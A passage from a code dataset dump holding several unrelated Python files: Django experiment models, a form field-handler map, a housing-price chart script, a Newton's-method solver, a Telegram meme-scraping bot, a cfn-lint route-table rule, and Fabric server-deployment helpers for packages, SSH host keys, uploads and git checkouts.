json.dumps(model_to_dict(config)),\n 'config_m': config,\n 'combination': newExperiment.nextCombination()}\n \ndef saveCombinationStatistics(data):\n \n experiments = data['user'].experimenthistory_set.all()\n current = None\n for experiment in experiments:\n if (not experiment.isFinished()): \n current = experiment\n new_stats = CombinationStatistics(combination = int(data['number']), answer = data['answer'], experiment = current)\n new_stats.save()\n\ndef giveTrainingData(user):\n \n trainingStatus = user.trainingstatus_set.all()[0]\n return trainingStatus.combinationsLeft\n \ndef saveTraining(user):\n \n trainingStatus = user.trainingstatus_set.all()[0]\n trainingStatus.combinationsLeft -= 1\n trainingStatus.save()\n","sub_path":"experiment1023/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"139798094","text":"from .address_handler import AddressHandler\nfrom .date_handlers import DateHandler, MonthYearDateHandler, YearDateHandler\nfrom .dropdown_handler import DropdownHandler\nfrom .duration_handler import DurationHandler\nfrom .mobile_number_handler import MobileNumberHandler\nfrom .number_handler import NumberHandler\nfrom .select_handlers import SelectHandler, SelectMultipleHandler\nfrom .string_handler import StringHandler\nfrom .text_area_handler import TextAreaHandler\n\nFIELD_HANDLER_MAPPINGS = {\n \"Checkbox\": SelectMultipleHandler,\n \"Radio\": SelectHandler,\n \"Relationship\": SelectHandler,\n \"TextArea\": TextAreaHandler,\n \"TextField\": StringHandler,\n \"Dropdown\": DropdownHandler,\n \"Number\": NumberHandler,\n \"Currency\": NumberHandler,\n \"Unit\": NumberHandler,\n \"Percentage\": NumberHandler,\n \"Date\": DateHandler,\n \"MonthYearDate\": MonthYearDateHandler,\n \"YearDate\": YearDateHandler,\n \"Duration\": DurationHandler,\n \"Address\": AddressHandler,\n \"MobileNumber\": MobileNumberHandler,\n}\n\n\ndef get_field_handler(\n answer,\n error_messages,\n answer_store,\n metadata=None,\n location=None,\n disable_validation=False,\n question_title=None,\n):\n return FIELD_HANDLER_MAPPINGS[answer.get(\"type\")](\n answer,\n error_messages=error_messages,\n answer_store=answer_store,\n metadata=metadata,\n location=location,\n disable_validation=disable_validation,\n question_title=question_title,\n )\n","sub_path":"app/forms/field_handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"88122204","text":"#!/usr/bin/env python\n# coding=utf-8\n# author: zengyuetian\n# 展示小区图表信息(仅仅支持MAC)\n# 1. 杀死之前启动的http服务器\n# 2. 启动一个新的http服务器\n# 3. 用浏览器打开生成的数据html文件\n\nimport pandas as pd\nimport argparse\nfrom pyecharts import Bar\n\nimport os\nimport string\nimport time\nfrom lib.utility.version import PYTHON_3\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='regression vm')\n parser.add_argument('--csv_file', help='csv file', default='xiaoqu.csv')\n parser.add_argument('--range', help='range', default='0,5')\n\n args = parser.parse_args()\n csv_file = args.csv_file\n [min_num, max_num] = args.range.split(',')\n min_num = int(min_num)\n max_num = int(max_num)\n\n try:\n import webbrowser as web\n auto_browse = True\n except Exception as e:\n auto_browse = False\n\n if auto_browse:\n try:\n if PYTHON_3:\n os.system(\"ps aux | grep python | grep http.server | grep -v grep | awk '{print $2}' | xargs kill\")\n os.system(\"python3 -m http.server 8080 & > /dev/null 2>&1 \")\n else:\n os.system(\"ps aux | grep python | grep SimpleHTTPServer | grep -v grep | awk '{print $2}' | xargs kill\")\n os.system(\"python -m SimpleHTTPServer 8080 & > /dev/null 2>&1 \")\n except Exception as e:\n print(e)\n\n # 注意,已经将分割符号转换成分号,因为有的小区名中有逗号\n names = ['district', 'area', 'name', 'price', 'on_sale']\n df = pd.read_csv(csv_file, encoding=\"utf-8\", sep=\";\", names=names)\n # 打印总行数\n print(\"row number is {0}\".format(len(df.index)))\n\n def format_price(price):\n formated_price = ''\n formated_price_number = -1\n for c in price:\n if c not in string.digits:\n break\n formated_price = formated_price + c\n if formated_price:\n formated_price_number = int(formated_price)\n return formated_price_number\n\n df.price = df.price.map(format_price)\n print(df.price)\n\n # 过滤房价为0的无效数据\n df = df[df.price > 0]\n # # 去除重复行\n # df = df.drop_duplicates()\n print(\"row number is {0}\".format(len(df.index)))\n\n ####################################################\n # 最贵的小区排名\n ####################################################\n df.sort_values(\"price\", ascending=False, inplace=True)\n city = df[\"area\"][0]\n xqs = df[\"name\"][min_num:max_num]\n prices = df[\"price\"][min_num:max_num]\n bar = Bar(\"{0}小区均价\".format(city))\n bar.add(\"小区均价前{},{}名\".format(min_num+1, max_num), xqs, prices, is_stack=True, is_label_show=True, xaxis_interval=0, xaxis_rotate=45)\n bar.render(path=\"xiaoqu.html\")\n\n ####################################################\n # 区县均价排名\n ####################################################\n district_df = df.groupby('district').mean()\n district_df = district_df.round(0)\n district_df.sort_values(\"price\", ascending=False, inplace=True)\n print(district_df)\n districts = district_df.index.tolist()\n prices = district_df[\"price\"]\n bar = Bar(\"{0}区县均价\".format(city))\n bar.add(\"区县均价排名\", districts, prices, is_stack=True, is_label_show=True, xaxis_interval=0, xaxis_rotate=45)\n bar.render(path=\"district.html\")\n\n if auto_browse:\n web.open(\"http://localhost:8080/xiaoqu.html\", new=0, autoraise=True)\n # web.open(\"http://localhost:8080/district.html\", new=0, autoraise=True)\n # 确保页面打开\n time.sleep(15)\n\n\n","sub_path":"xiaoqu_to_chart.py","file_name":"xiaoqu_to_chart.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"396724416","text":"from math import *\r\nfrom sympy import *\r\n\r\nwhile True:\r\n l = input(\"Your function (like x**2; 2**x; 1/x + 1; etc): \\n\")\r\n x = symbols(\"x\")\r\n funct = Lambda(x, l)\r\n deriv = Lambda(x, diff(l))\r\n\r\n n = float(input(\"Give us any arbitrary value (x0): \\n\"))\r\n\r\n for w in range(100):\r\n n = n - (funct(n)/deriv(n))\r\n\r\n print(n)","sub_path":"Newton Approximator.py","file_name":"Newton Approximator.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"618200986","text":"from telegram.ext import Updater, InlineQueryHandler, CommandHandler\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date\nfrom Newsfun import *\n\n\nimport logging\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nlogging.basicConfig( filename='telegram.log',\n filemode='a',\n datefmt='%H:%M:%S',\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ndef get_memes():\n session = requests.Session()\n response = session.get(\"https://memechat.app\")\n soup = BeautifulSoup(response.content, 'html.parser')\n content_class = soup.find_all(\"div\", {\"class\": \"article-content\"})\n images = []\n image_url = []\n i = 0\n for img in content_class:\n images.append( img.find_all('img'))\n image_url.append(images[i][0]['src'])\n i = i + 1\n return image_url\n\n\ndef memes(update , context):\n name = update.effective_user.first_name\n logger.info(\"User %s started the Memes Command.\", name)\n memes = get_memes()\n chat_id = update.effective_message.chat_id\n for img in memes:\n context.bot.send_photo(chat_id=chat_id, photo=img)\n","sub_path":"memesfuns.py","file_name":"memesfuns.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"602277699","text":"\"\"\"\n Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n\n Permission is hereby granted, free of charge, to any person obtaining a copy of this\n software and associated documentation files (the \"Software\"), to deal in the Software\n without restriction, including without limitation the rights to use, copy, modify,\n merge, publish, distribute, sublicense, and/or sell copies of the Software, and to\n permit persons to whom the Software is furnished to do so.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\n INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nfrom collections import defaultdict\nimport six\nfrom cfnlint.rules import CloudFormationLintRule\nfrom cfnlint.rules import RuleMatch\nimport cfnlint.helpers\n\n\nclass RouteTableAssociation(CloudFormationLintRule):\n \"\"\"Check only one route table association defined per subnet\"\"\"\n id = 'E3022'\n shortdesc = 'Resource SubnetRouteTableAssociation Properties'\n description = 'Validate there is only one SubnetRouteTableAssociation per subnet'\n source_url = 'https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-ec2-subnet-route-table-assoc.html'\n tags = ['resources', 'subnet', 'route table']\n\n # Namespace for unique associated subnets in the form condition::value\n resource_values = {}\n associated_resources = defaultdict(list)\n\n def get_values(self, subnetid, resource_condition, property_condition):\n \"\"\"Get string literal(s) from value of SubnetId\"\"\"\n values = []\n if isinstance(subnetid, dict):\n if len(subnetid) == 1:\n for key, value in subnetid.items():\n if key in cfnlint.helpers.CONDITION_FUNCTIONS:\n if isinstance(value, list):\n if len(value) == 3:\n property_condition = value[0]\n values.extend(self.get_values(value[1], resource_condition, property_condition))\n values.extend(self.get_values(value[2], resource_condition, property_condition))\n if key == 'Ref':\n values.extend(self.get_values(value, resource_condition, property_condition))\n if key == 'Fn::GetAtt':\n if isinstance(value[1], (six.string_types)):\n sub_value = '.'.join(value)\n values.append((resource_condition, property_condition, sub_value))\n else:\n values.append((resource_condition, property_condition, subnetid))\n return values\n\n def check_values(self, subnetid, resource_condition, resource_name):\n \"\"\"Check subnet value is not associated with other route tables\"\"\"\n property_condition = None\n values = self.get_values(subnetid, resource_condition, property_condition)\n self.resource_values[resource_name] = values\n for value in values:\n self.associated_resources[value].append(resource_name)\n\n def match(self, cfn):\n \"\"\"Check SubnetRouteTableAssociation Resource Properties\"\"\"\n matches = []\n resources = cfn.get_resources(['AWS::EC2::SubnetRouteTableAssociation'])\n for resource_name, resource in resources.items():\n properties = resource.get('Properties')\n if properties:\n resource_condition = resource.get('Condition')\n subnetid = properties.get('SubnetId')\n self.check_values(subnetid, resource_condition, resource_name)\n for resource_name in self.resource_values:\n for value in self.resource_values[resource_name]:\n bare_value = (None, None, value[2])\n other_resources = []\n\n if len(self.associated_resources[value]) > 1:\n for resource in self.associated_resources[value]:\n if resource != resource_name:\n other_resources.append(resource)\n\n if value != bare_value and self.associated_resources[bare_value]:\n other_resources.extend(self.associated_resources[bare_value])\n\n if other_resources:\n path = ['Resources', resource_name, 'Properties', 'SubnetId']\n message = 'SubnetId in {0} is also associated with {1}'\n matches.append(\n RuleMatch(path, message.format(resource_name, ', '.join(other_resources))))\n\n return matches\n","sub_path":"src/cfnlint/rules/resources/ectwo/RouteTableAssociation.py","file_name":"RouteTableAssociation.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"282374366","text":"\"\"\"\nFabric helpers\n\"\"\"\n\nimport hashlib\nimport os\nimport posixpath\nimport subprocess\nimport string\nimport sys\nimport tempfile\nimport textwrap\nimport urlparse\nfrom StringIO import StringIO\nfrom contextlib import closing\nfrom pipes import quote # TBD: use shlex.quote on Python 3.2+\n\nfrom fabric.api import (\n run, sudo, quiet, settings, cd, env, abort, task, with_settings,\n)\nfrom fabric.contrib.files import exists, append\nfrom fabric.utils import apply_lcwd\nfrom fabric.sftp import SFTP\n\n\n#\n# Constants\n#\n\n# Produced by 'ssh-keyscan github.com'\nGITHUB_SSH_HOST_KEY = \"github.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==\"\n\n# Fingerprint from https://help.github.com/articles/what-are-github-s-ssh-key-fingerprints/\nGITHUB_SSH_HOST_KEY_FINGERPRINT = \"16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48\"\nGITHUB_SSH_HOST_KEY_FINGERPRINT_SHA256 = \"SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8\"\n\n# Known SSH host keys to be added to ~/.ssh/known_hosts if needed\nKNOWN_HOSTS = {\n \"github.com\": GITHUB_SSH_HOST_KEY,\n}\n\n\n#\n# Command-line parsing\n#\n\ndef asbool(v):\n \"\"\"Convert value to boolean.\"\"\"\n if isinstance(v, basestring):\n return v.lower() in ('yes', 'true', 'on', '1')\n else:\n return bool(v)\n\n\ndef aslist(v):\n \"\"\"Convert value to list.\"\"\"\n if isinstance(v, basestring):\n return v.split()\n else:\n return list(v)\n\n\n#\n# System management helpers\n#\n\ndef assert_shell_safe(*args, **kw):\n \"\"\"Check that each argument can be passed to shell safely.\n\n This is ultra-paranoid mode: only a small set of whitelisted characters are\n allowed. No spaces, no leading dashes, no glob wildcards, no quotes, no\n backticks, no dollar signs, no history expansion, no brace expansion.\n\n Tilde expansion is allowed.\n\n It might be too strict. Therefore you can supply a keyword-only argument\n ``extra_allow`` that lists additional characters to be allowed.\n \"\"\"\n extra_allow = kw.pop('extra_allow', '')\n if kw:\n raise TypeError('unexpected keyword arguments: {}'\n .format(', '.join(sorted(kw))))\n allowed_chars = set(string.letters + string.digits + '/-._~')\n allowed_chars.update(extra_allow)\n for arg in args:\n if not set(arg) <= allowed_chars or arg.startswith('-'):\n raise ValueError('{} is not safe for shell'.format(arg))\n\n\ndef ensure_apt_not_outdated():\n \"\"\"Make sure apt-get update was run within the last day.\"\"\"\n if not run(\"find /var/lib/apt/lists -maxdepth 0 -mtime -1\", quiet=True):\n sudo(\"apt-get update -qq\")\n\n\ndef package_available(package):\n \"\"\"See if a package is available for installation.\"\"\"\n assert_shell_safe(package)\n with quiet():\n output = run('apt-cache madison {}'.format(package))\n # The terrible: apt-cache always returns status code 0 and never prints\n # to stderr, no matter if the package is or isn't available. The error\n # message is translated. If the package is available, the output is\n # a multi-line list with |-separated columns that contain package\n # names, versions, and the repository info.\n return '|' in output\n\n\ndef package_installed(package):\n \"\"\"Check if the specified packages is installed.\"\"\"\n assert_shell_safe(package)\n # XXX: doing this in a loop is slow :(\n with quiet():\n # XXX idea: return exists('/var/lib/dpkg/info/{}.list'.format(package))\n # caveats: libnss-myhostname:amd64.list :/\n status = run(\"dpkg-query -W --showformat='${Status}' %s\" % package)\n return status == \"install ok installed\"\n\n\ndef install_packages(*packages, **kw):\n \"\"\"Install system packages.\n\n You can use any of these styles::\n\n install_packages('foo bar')\n install_packages('foo', 'bar')\n install_packages(['foo', 'bar'])\n\n Keyword arguments:\n\n - ``missing_only`` (default: False) -- apt-get install only the missing\n packages. This can be slower than just letting apt figure it out.\n\n - ``interactive`` (default: False) -- allow interactive prompts during\n package installation.\n\n - ``changelog`` (default: False) -- record installed packages in\n /root/Changelog\n\n \"\"\"\n missing_only = kw.pop('missing_only', False)\n interactive = kw.pop('interactive', False)\n changelog = kw.pop('changelog', False)\n if kw:\n raise TypeError('unexpected keyword arguments: {}'\n .format(', '.join(sorted(kw))))\n if len(packages) == 1 and not isinstance(packages[0], str):\n # handle lists and tuples\n packages = packages[0]\n packages = \" \".join(packages).split()\n if missing_only:\n packages = [p for p in packages if not package_installed(p)]\n if not packages:\n return\n ensure_apt_not_outdated()\n for package in packages:\n assert_shell_safe(package)\n command = \"apt-get install -qq -y %s\" % \" \".join(packages)\n if not interactive:\n command = \"DEBIAN_FRONTEND=noninteractive \" + command\n if changelog:\n changelog_append(\"apt-get install %s\" % \" \".join(packages))\n sudo(command)\n\n\ndef install_missing_packages(*packages, **kw):\n \"\"\"Install missing system packages.\n\n Alias for install_packages(*packages, missing_only=True, **kw).\n \"\"\"\n kw.setdefault('missing_only', True)\n install_packages(*packages, **kw)\n\n\ndef ssh_key_fingerprint(host_key, force_md5=False):\n \"\"\"Compute the fingerprint of a public key.\n\n Can return a SHA256 or an MD5 fignerprint, depending on your OpenSSH\n version. You can insist on MD5 if you want.\n \"\"\"\n if not host_key.startswith('ssh-'):\n host_key = host_key.split(None, 1)[1]\n with tempfile.NamedTemporaryFile(prefix='pov-fabric-') as f:\n f.write(host_key)\n f.flush()\n output = subprocess.check_output(['ssh-keygen', '-l', '-f', f.name])\n # Example output (old ssh):\n # \"2048 16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48 /tmp/github_rsa.pub (RSA)\\n\"\n # Example output (new ssh):\n # \"2048 SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8 no comment (RSA)\\n\"\n # Example output (new ssh with -E md5):\n # \"2048 MD5:16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48 no comment (RSA)\\n\"\n fingerprint = output.split()[1]\n if fingerprint.startswith('SHA256') and force_md5:\n # we want MD5 still, for backwards-compat, but we should stop doing\n # that eventually\n output = subprocess.check_output(['ssh-keygen', '-l', '-f', f.name,\n '-E', 'md5'])\n fingerprint = output.split()[1].replace('MD5:', '')\n return fingerprint\n\n\ndef register_host_key(host_key, fingerprint=None, fingerprints=None, force_md5=False):\n \"\"\"Register a known host key.\n\n This will be used by git_clone() and such to add the host key automatically\n if you're cloning from the host.\n \"\"\"\n if fingerprint is not None:\n if fingerprints is not None:\n raise ValueError('Please provide either fingerprint or fingerprints, but not both')\n fingerprints = [fingerprint]\n force_md5 = True\n hostname = host_key.split()[0]\n if hostname in KNOWN_HOSTS and KNOWN_HOSTS[hostname] != host_key:\n abort(\"There's a different host key already registered for {}\".format(hostname))\n if fingerprint:\n if ssh_key_fingerprint(host_key, force_md5=force_md5) not in fingerprints:\n abort(\"SSH host key doesn't match fingerprint\")\n KNOWN_HOSTS[hostname] = host_key\n\n\ndef ensure_known_host(host_key, known_hosts='/root/.ssh/known_hosts'):\n \"\"\"Make sure a host key exists in the known_hosts file.\n\n This is idempotent: running it again won't add the same key again.\n \"\"\"\n assert_shell_safe(known_hosts)\n if not exists(known_hosts, use_sudo=True):\n ensure_directory(posixpath.dirname(known_hosts), mode=0o700)\n sudo('touch %s' % known_hosts)\n # Must use shell=True to work around Fabric bug, where it would fall\n # flat in contains() with an error (\"sudo: export: command not\n # found\") that is silently suppressed, resulting in always appending\n # the ssh key to /root/.ssh/known_hosts. Probably because I use\n # `with shell_env(LC_ALL='C.UTF-8'):`.\n append(known_hosts, host_key, use_sudo=True, shell=True)\n\n\ndef ensure_user(user, shell=None, home=None, changelog=False, create_home=True):\n \"\"\"Create a system user if it doesn't exist already.\n\n This is idempotent: running it again won't add the same user again.\n \"\"\"\n assert_shell_safe(user, shell or '', home or '')\n with quiet():\n if run(\"id {user}\".format(user=user)).succeeded:\n # XXX: check if shell matches what we asked, and run chsh if not?\n return\n doit = run_and_changelog if changelog else sudo\n with settings(sudo_user=\"root\"):\n command = ['adduser --quiet --system --group --disabled-password']\n if shell:\n command.append('--shell={}'.format(shell))\n if home:\n command.append('--home={}'.format(home))\n if not create_home:\n command.append('--no-create-home')\n command.append(user)\n doit(\" \".join(command))\n\n\ndef ensure_locales(*languages):\n \"\"\"Make sure locales are generated.\n\n Example::\n\n ensure_locales('en', 'lt')\n\n \"\"\"\n assert_shell_safe(*languages)\n supported_locales = run(\"locale -a\", quiet=True).splitlines()\n # as a shortcut we'll assume that if one xx_... locale is supported\n # then all of them are supported\n supported_languages = set(locale.partition('.')[0].partition('_')[0]\n for locale in supported_locales)\n for language in languages:\n if language not in supported_languages:\n sudo(\"locale-gen {language}\".format(language=language))\n\n\ndef ensure_directory(pathname, mode=None):\n \"\"\"Make sure directory exists.\n\n Returns True if it had to create the directory, False if the directory\n already existed.\n \"\"\"\n if isinstance(mode, int):\n mode = '{:o}'.format(mode)\n assert_shell_safe(pathname, mode or '')\n if not exists(pathname, use_sudo=True):\n command = ['install -d']\n if mode:\n command.append('-m{}'.format(mode))\n command.append(pathname)\n sudo(' '.join(command))\n return True\n else:\n return False\n\n\ndef upload_file(local_file, remote_path, mode=0o644, owner=\"root:root\",\n temp_dir=\"\", changelog=False):\n \"\"\"Upload a file to a remote host.\n\n ``local_file`` can be a filename or a seekable file-like object. Globbing\n is not supported.\n\n ``remote_file`` should be a full filename, not just the directory.\n\n ``mode`` can be an integer (e.g. 0o755).\n\n ``changelog``, if True, adds a changelog message of the form \"uploaded\n {filename}\".\n\n Bug: doesn't handle ``with cd(...):`` or ``with lcd(...):``. Probably.\n\n Bug: doesn't set mode/ownership if the file exists and has the same content\n but different mode/ownership.\n\n Warning: is not suitable for uploading secrets (changes the mode after\n uploading the file), unless you take care to specify ``temp_dir`` to point\n to a non-world-readable area.\n\n Undocumented features that are subject to change without notice:\n ``mode`` can be a string or None; ``owner`` can be None.\n \"\"\"\n if isinstance(mode, int):\n mode = '{:o}'.format(mode)\n assert_shell_safe(remote_path, mode or '', temp_dir)\n assert_shell_safe(owner or '', extra_allow=':')\n local_is_path = not callable(getattr(local_file, 'read', None))\n if isinstance(local_file, StringIO) and not getattr(local_file, 'name', None):\n local_file.name = os.path.basename(remote_path)\n with closing(SFTP(env.host_string)) as ftp:\n if env.get('cwd'):\n home = ftp.normalize('.')\n temp_dir = posixpath.join(home, temp_dir)\n tmp_path = posixpath.join(\n temp_dir, hashlib.sha1(env.host_string + remote_path).hexdigest())\n assert_shell_safe(tmp_path)\n ftp.put(local_file, tmp_path, use_sudo=False, mirror_local_mode=False,\n mode=None, local_is_path=local_is_path, temp_dir=\"\")\n with quiet():\n same = sudo(\"test -f {realfile} && cmp -s {tempfile} {realfile}\".format(\n tempfile=tmp_path, realfile=remote_path)).succeeded\n if same:\n sudo(\"rm {tempfile}\".format(tempfile=tmp_path))\n return False\n else:\n if mode is not None:\n sudo('chmod {mode} {tempfile}'.format(mode=mode, tempfile=tmp_path))\n if owner:\n sudo('chown {owner} {tempfile}'.format(owner=owner, tempfile=tmp_path))\n sudo(\"mv {tempfile} {realfile}\".format(tempfile=tmp_path,\n realfile=remote_path))\n if changelog:\n changelog_append(\"# updated {}\".format(remote_path))\n return True\n\n\ndef render_jinja2(template_filename, context, template_dir=None):\n \"\"\"Render a Jinja2 template.\n\n Based on fabric.contrib.files.upload_template.\n\n Differences: adds back the trailing newline that Jinja2 eats for some\n reason.\n \"\"\"\n from jinja2 import Environment, FileSystemLoader\n template_dir = template_dir or os.getcwd()\n template_dir = apply_lcwd(template_dir, env)\n jenv = Environment(loader=FileSystemLoader(template_dir))\n text = jenv.get_template(template_filename).render(**context or {})\n return text.encode('UTF-8') + '\\n'\n\n\ndef render_sinterp(filename, context=None, template_dir=None):\n \"\"\"Render a Python 2 string template.\n\n Based on fabric.contrib.files.upload_template.\n \"\"\"\n if template_dir:\n filename = os.path.join(template_dir, filename)\n filename = apply_lcwd(filename, env)\n with open(os.path.expanduser(filename)) as inputfile:\n text = inputfile.read()\n if context:\n text = text % context\n return text\n\n\ndef generate_file(template, filename, context=None, use_jinja=False,\n mode=0o644, owner=\"root:root\", changelog_append=True):\n \"\"\"Generate a file from a template\n\n Generates ``filename`` on the remote server using ``template`` as a source.\n The syntax depends on ``use_jinja``: either Jinja2 (if True) or Python's\n builtin string formatting (of the older, ``%(name)s`` variety).\n ``context`` should be a dict containing variables for interpolation.\n\n Changes the file ownership and mode.\n\n Creates the parent directory automatically if it doesn't exist (owned by\n root, mode 0755).\n\n If ``changelog_append`` is True, calls changelog_append() to note that\n ``filename`` was generated.\n\n Returns True if it had to replace the file, False if the file already\n existed with the right content.\n \"\"\"\n assert_shell_safe(filename)\n ensure_directory(posixpath.dirname(filename))\n if use_jinja:\n text = render_jinja2(template, context)\n else:\n text = render_sinterp(template, context)\n if upload_file(StringIO(text), filename, mode=mode, owner=owner):\n changelog('# generated {filename}'.format(filename=filename),\n append=changelog_append)\n return True\n else:\n return False\n\n\ndef download_file(filename, url):\n \"\"\"Download a file from a given URL.\"\"\"\n assert_shell_safe(filename)\n assert_shell_safe(url, extra_allow=':')\n run_and_changelog('wget {url} -O {filename}'.format(url=url, filename=filename))\n\n\n#\n# Git\n#\n\ndef parse_git_repo(git_repo):\n \"\"\"Parse a git repository URL.\n\n git-clone(1) lists these as examples of supported URLs:\n\n - ssh://[user@]host.xz[:port]/path/to/repo.git/\n - git://host.xz[:port]/path/to/repo.git/\n - http[s]://host.xz[:port]/path/to/repo.git/\n - ftp[s]://host.xz[:port]/path/to/repo.git/\n - rsync://host.xz/path/to/repo.git/\n - [user@]host.xz:path/to/repo.git/\n - ssh://[user@]host.xz[:port]/~[user]/path/to/repo.git/\n - git://host.xz[:port]/~[user]/path/to/repo.git/\n - [user@]host.xz:/~[user]/path/to/repo.git/\n - /path/to/repo.git/\n - file:///path/to/repo.git/\n\n This function doesn't support the ::
    syntax, and it\n doesn't understand insteadOf shortcuts from ~/.gitconfig.\n \"\"\"\n if '://' in git_repo:\n return urlparse.urlparse(git_repo)\n if ':' in git_repo:\n netloc, colon, path = git_repo.partition(':')\n return urlparse.ParseResult('ssh', netloc, path, '', '', '')\n else:\n return urlparse.ParseResult('file', '', git_repo, '', '', '')\n\n\n@with_settings(sudo_user='root')\ndef git_clone(git_repo, work_dir, branch='master', force=False,\n changelog=False):\n \"\"\"Clone a specified branch of the git repository into work_dir.\n\n If work_dir exists and force is False (default), aborts.\n\n If work_dir exists and force is True, performs a 'git fetch' followed by\n 'git reset --hard origin/{branch}'.\n\n Takes care to allow SSH agent forwarding to be used for authentication,\n if you use SSH.\n\n Takes care to add the SSH host key to /root/.ssh/known_hosts, if you're\n cloning from a host in KNOWN_HOSTS.\n\n Returns the commit hash of the version cloned.\n \"\"\"\n assert_shell_safe(git_repo, extra_allow='@:')\n assert_shell_safe(work_dir, branch)\n env = {}\n url = parse_git_repo(git_repo)\n if url.scheme == 'ssh':\n host_key = KNOWN_HOSTS.get(url.hostname)\n if host_key:\n ensure_known_host(host_key)\n # sudo removes SSH_AUTH_SOCK from the environment, so we can't make use\n # of the ssh agent forwarding unless we cunningly preserve the envvar\n # and sudo to root (because only root and the original user will be\n # able to access the socket)\n env['SSH_AUTH_SOCK'] = run(\"echo $SSH_AUTH_SOCK\", quiet=True)\n if exists(posixpath.join(work_dir, '.git')):\n return git_update(work_dir, branch=branch, force=force,\n changelog=changelog, verify_remote_url=git_repo)\n doit = run_and_changelog if changelog else sudo\n with settings(shell_env=env):\n doit(\"git clone -b {branch} {git_repo} {work_dir}\".format(\n branch=branch,\n git_repo=git_repo,\n work_dir=work_dir))\n with cd(work_dir):\n got_commit = sudo(\"git describe --always --dirty\", quiet=True).strip()\n if changelog:\n changelog_append('# got commit {sha}'.format(sha=got_commit))\n return got_commit\n\n\n@with_settings(sudo_user='root')\ndef git_update(work_dir, branch='master', force=False, changelog=False,\n verify_remote_url=None):\n \"\"\"Update a specified git checkout.\n\n Aborts if the checkout cannot be fast-forwarded to the specified branch,\n unless force is specified.\n\n Discards all local changes (committed or not) if force is True, so use with\n care!\n\n Returns the commit hash of the version fetched.\n \"\"\"\n assert_shell_safe(work_dir, branch)\n env = {}\n with cd(work_dir):\n with quiet():\n tracking_branch = run(\"git rev-parse --symbolic-full-name 'HEAD@{u}'\")\n if not tracking_branch.startswith(\"refs/remotes/origin/\"):\n abort(\"{} is not tracking a branch from remote 'origin'\".format(work_dir))\n tracking_branch = tracking_branch[len(\"refs/remotes/origin/\"):]\n if force and tracking_branch != branch:\n changelog_append('cd {work_dir} && git checkout {branch}'.format(\n work_dir=work_dir, branch=branch))\n sudo(\"git checkout {branch}\".format(branch=branch))\n with quiet():\n tracking_branch = run(\"git rev-parse --symbolic-full-name 'HEAD@{u}'\")\n if not tracking_branch.startswith(\"refs/remotes/origin/\"):\n abort(\"{} is not tracking a branch from remote 'origin'\".format(work_dir))\n tracking_branch = tracking_branch[len(\"refs/remotes/origin/\"):]\n if tracking_branch != branch:\n abort(\"{} is not tracking branch {} (it's tracking {})\".format(\n work_dir, branch, tracking_branch))\n git_repo = run(\"git config --get remote.origin.url\", quiet=True)\n if verify_remote_url and git_repo != verify_remote_url:\n abort(\"{} is not tracking the right remote {} (it's tracking {})\".format(\n work_dir, verify_remote_url, git_repo))\n url = parse_git_repo(git_repo)\n if url.scheme == 'ssh':\n host_key = KNOWN_HOSTS.get(url.hostname)\n if host_key:\n ensure_known_host(host_key)\n # sudo removes SSH_AUTH_SOCK from the environment, so we can't make use\n # of the ssh agent forwarding unless we cunningly preserve the envvar\n # and sudo to root (because only root and the original user will be\n # able to access the socket)\n env['SSH_AUTH_SOCK'] = run(\"echo $SSH_AUTH_SOCK\", quiet=True)\n with cd(work_dir):\n with settings(shell_env=env):\n sudo(\"git fetch\")\n old_commit = sudo(\"git describe --always --dirty\", quiet=True).strip()\n if force:\n changelog_append('cd {work_dir}\\n git fetch && git reset --hard origin/{branch}'.format(\n work_dir=work_dir, branch=branch))\n sudo(\"git reset 